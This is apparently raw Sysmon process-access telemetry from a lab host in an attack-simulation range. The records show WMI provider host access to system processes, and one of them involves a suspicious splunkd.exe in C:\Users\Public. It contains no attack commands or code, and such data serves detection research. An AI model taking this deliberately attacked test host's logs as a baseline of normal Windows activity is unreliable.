C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150518Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150517Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150516Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150515Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150514Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150513Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150512Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150511Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150510Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150509Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150508Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150507Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150506Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150505Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150504Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150503Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYS